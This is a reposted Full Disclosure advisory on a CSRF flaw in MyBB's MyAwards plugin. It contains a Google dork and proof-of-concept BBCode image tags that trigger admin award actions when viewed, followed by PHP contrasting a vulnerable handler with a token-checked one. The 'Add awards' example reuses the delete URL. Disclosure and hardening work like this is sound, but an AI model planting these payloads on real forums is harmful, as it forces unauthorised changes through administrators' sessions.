HackDig : Dig high-quality web security articles for hackers

MyBB 1.6 - MyAwards CSRF

2014-08-25 21:10
# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15

PoC (set this as your signature or iframe it):
Add awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
[/img]
Remove awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
[/img]
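The root cause the PoC exploits is an admin action that performs a deletion on a plain GET with no request token, so any page the admin views can trigger it. As an added illustration (not the MyAwards plugin's or MyBB's own code, and not part of the advisory), the vulnerable handler shape beside a hardened one; the function, table and message strings are hypothetical, while `$mybb->request_method`, `$mybb->post_code`, `verify_post_check()`, `flash_message()`, `admin_redirect()` and the admin `Form` class are assumed to be the MyBB 1.6 core/admin facilities loaded by `admin/index.php`.

```php
<?php
// Added example, not the MyAwards plugin's or MyBB's own code.
// Function, table and message names are hypothetical; $mybb, $db,
// verify_post_check(), flash_message(), admin_redirect() and Form are
// assumed to be the MyBB 1.6 facilities available inside admin/index.php.

// Vulnerable shape: a destructive action driven entirely by GET parameters.
// An <img> or <iframe> pointing at the URL makes the admin's browser fetch
// it with the admin session cookie attached, which is the CSRF in the advisory.
function awards_delete_user_vulnerable()
{
    global $mybb, $db;

    $awuid = intval($mybb->input['awuid']);
    $db->delete_query("myawards_users", "id='{$awuid}'");   // hypothetical table
    admin_redirect("index.php?module=user-awards&action=awards");
}

// Hardened shape: the state change happens only on a POST that carries the
// per-session token MyBB issues as $mybb->post_code (posted back as my_post_key).
function awards_delete_user_hardened()
{
    global $mybb, $db;

    // 1. Embedded images/iframes can only issue GET, so a GET gets a
    //    confirmation form instead of an action. The admin Form class is
    //    assumed to emit the my_post_key hidden field itself, so a genuine
    //    submission from this page carries the token.
    if($mybb->request_method != "post")
    {
        $form = new Form("index.php?module=user-awards&action=awards_delete_user", "post");
        echo $form->generate_hidden_field("awuid", intval($mybb->input['awuid']));
        echo $form->generate_submit_button("Remove award");
        $form->end();
        return;
    }

    // 2. Token check: verify_post_check() compares my_post_key with the value
    //    derived from the current session and stops with an error on mismatch,
    //    so a cross-site POST without the token never reaches step 3.
    verify_post_check($mybb->input['my_post_key']);

    // 3. Only now touch the database.
    $awuid = intval($mybb->input['awuid']);
    $db->delete_query("myawards_users", "id='{$awuid}'");   // hypothetical table
    flash_message("Award removed.", "success");                // hypothetical string
    admin_redirect("index.php?module=user-awards&action=awards");
}
```

The same two checks (POST only, token verified) apply to the add-award action the PoC also targets; a confirmation step alone is not a CSRF defence without the token.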

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Source: seclists.org/fulldisclosure/2014/Aug/67
